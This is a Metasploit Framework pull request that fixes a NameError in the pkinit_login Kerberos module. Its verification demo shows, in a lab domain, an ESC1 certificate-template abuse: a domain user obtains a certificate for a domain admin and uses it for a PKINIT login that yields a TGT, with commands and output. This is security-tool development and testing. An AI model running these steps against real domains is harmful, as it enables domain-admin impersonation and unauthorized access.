### PR TITLE
Fix a NameError in pkinit_login

### DIFF
--- a/modules/auxiliary/admin/kerberos/pkinit_login.rb
+++ b/modules/auxiliary/admin/kerberos/pkinit_login.rb
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Auxiliary
       )
 
       ccache = Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.from_responses(tgt_result.as_rep, enc_part)
-      Kerberos::Ticket::Storage.store_ccache(ccache, host: rhost, framework_module: self)
+      Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache(ccache, host: rhost, framework_module: self)
     rescue Rex::Proto::Kerberos::Model::Error::KerberosError => e
       fail_with(Failure::Unknown, e.message)
     rescue ::EOFError, Errno::ECONNRESET, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error => e


### PR DESCRIPTION
This fixes a `NameError` in the pkinit_login module I accidentally added in #17377.

To test it, issue a certificate with icpr_cert then authenticate to the KDC to obtain a ticket.

## Verification

List the steps needed to make sure this thing works

- [x] Setup a template that's vulnerable to ESC1 by following the steps in the "Configure a certificate template to be vulnerable via ESC1" section of https://github.com/rapid7/metasploit-framework/pull/16939
- [x] Issue the template, `MSFLAB\aliddle` is a domain user `MSFLAB\smcintyre` is a domain admin
- [x] Follow the steps in the demo

## Demo

```
[*] Using auxiliary/admin/dcerpc/icpr_cert
msf6 auxiliary(admin/dcerpc/icpr_cert) > run RHOSTS=192.168.159.10 ALT_UPN=smcintyre@msflab.local SMBUser=aliddle SMBPass=Password1! CERT_TEMPLATE=ESC1-Test CA=MSFLAB-DC-CA
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - Requesting a certificate...
[+] 192.168.159.10:445 - The requested certificate was issued.
[*] 192.168.159.10:445 - Certificate UPN: smcintyre@msflab.local
[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221216150244_default_unknown_windows.ad.cs_162338.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) > use pkinit_login

Matching Modules
================

   #  Name                                   Disclosure Date  Rank    Check  Description
   -  ----                                   ---------------  ----    -----  -----------
   0  auxiliary/admin/kerberos/pkinit_login                   normal  No     Kerberos Authentication Check Scanner


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/kerberos/pkinit_login

[*] Using auxiliary/admin/kerberos/pkinit_login
msf6 auxiliary(admin/kerberos/pkinit_login) > run RHOSTS=192.168.159.10 CERT_FILE=/home/smcintyre/.msf4/loot/20221216150244_default_unknown_windows.ad.cs_162338.pfx
[*] Running module against 192.168.159.10

[*] Attempting PKINIT login for smcintyre@msflab.local
[+] Successfully authenticated with certificate
[*] 192.168.159.10:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20221216150302_default_192.168.159.10_mit.kerberos.cca_729805.bin
[*] Auxiliary module execution completed
msf6 auxiliary(admin/kerberos/pkinit_login) >
```
